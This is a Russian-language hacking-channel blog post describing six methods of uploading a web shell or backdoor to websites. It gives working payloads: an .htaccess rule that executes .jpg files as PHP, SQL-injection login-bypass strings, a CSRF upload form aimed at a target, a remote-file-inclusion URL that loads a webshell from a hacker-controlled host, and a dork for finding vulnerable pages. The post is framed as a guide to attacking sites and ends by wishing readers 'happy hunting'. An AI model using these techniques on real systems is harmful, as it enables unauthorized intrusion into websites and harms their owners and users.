About Teletype
Join
hackerplace.org
@hackerplace_org
Hacking
June 23, 2022

Виды загрузок шелла или бэкдора на сайт

Сегодня мы расскажем вам о 6 способах загрузить шелл или бэкдор на сайт.

Всем салют, дорогие друзья!
Сегодня мы расскажем вам о способах загрузить шелл или бэкдор на сайт.

Способ 1

Для начала необходимо найти на сайте форму для загрузки файлов/картинок.

  • Допустим нам не удалось взломать админку сайта и мы пытаемся залить наш шелл с расширением .php.jpg.
  • Если удалось, то мы увидим вместо картинки белое окно.
  • Далее мы кликаем правой кнопкой мыши и переходим по ссылке.
В случае провала мы можем воспользоваться расширением chrome - tamper data. Оно позволяет перехватить и изменить запрос, как вы хотите.
  • Если сайт проверяет, расширение файла, то сначала мы можем залить .htaccess файл с содержимым:
AddType application/x-httpd-php .jpg

Приведенная выше команда будет выполнять jpg файлы, как php.

Способ 2

  • ​Воспользуемся программой для поиска админок на сайте - https://github.com/bdblackhat/admin-panel-finder.
  • Когда программа нашла админку мы можем попробовать провести sql-injection.
  • В поле логина и пароля сайта мы вбиваем код:
' or '1'='1
' OR 1=1/*
  • Если срабатывает, то мы попадаем в админку и действуем по 1 способу.
  • Если же на сайте в панели администратора нет sql-injection, тогда мы можем попробовать сбрутить или же найти эксплоит под данную CMS.

Способ 3

В 3 способе мы будем искать sql-injection на самом сайте. Мы может делать это вручную или же воспользуемся sqlmap.

Итак, вот мы уже нашли таблицу с логином и паролем админа расшифровываем хэши заходим в админку и радуемся.
  • Но, допустим, мы не смогли расшифровать пароль и все накрылось медным тазом, тогда мы должны проверить привилегии нашего юзера.
  • Проверяем привилегии и загружаем мини-шелл.

Способ 4

​Четвертый способ подразумевает проведение csrf атаки. В ниже приведенном коде нам нужно заменить http:// на ссылку нашей цели. Выбрать шелл и нажать кнопку upload.

<form method="POST" action="http://" enctype="multipart/form-data" >
<input type="file" name="Filedata"></center><br>
<input type="submit" name="Submit" value="Upload">
</form>

Способ 5

Для этого способа необходимо узнать как можно больше о вашей цели и подыскать подходящий эксплоит. Для этого есть очень интересный сайт - https://www.exploit-db.com.

Существует еще множество способов заливки шелла и рассказывать о каждом нет смысла. Если вы хотите потренироваться, то установите dvwa - это программа созданная для того, чтобы помочь профессионалам по безопасности протестировать их навыки и инструменты в легальном окружении.

Способ 6

Php-injection - это форма атаки на сайт, когда атакующий внедряет свой php-код в атакуемое php-приложение. 

www.site.ru?page=home.html

Выполнив команду выше мы подгрузим страницу home.html.

  • Теперь мы попробуем подгрузить вредоносный шелл:
www.site.ru?page=http:/hacker.ru/webshell.php

Дорк: Inurl:page=

Также есть способ найти уже залитый шелл с помощью скрипта.

На сегодня это все. Желаем удачной охоты!

👉Да, хочу!ᅠ

June 23, 2022, 14:49
0 views
0 reposts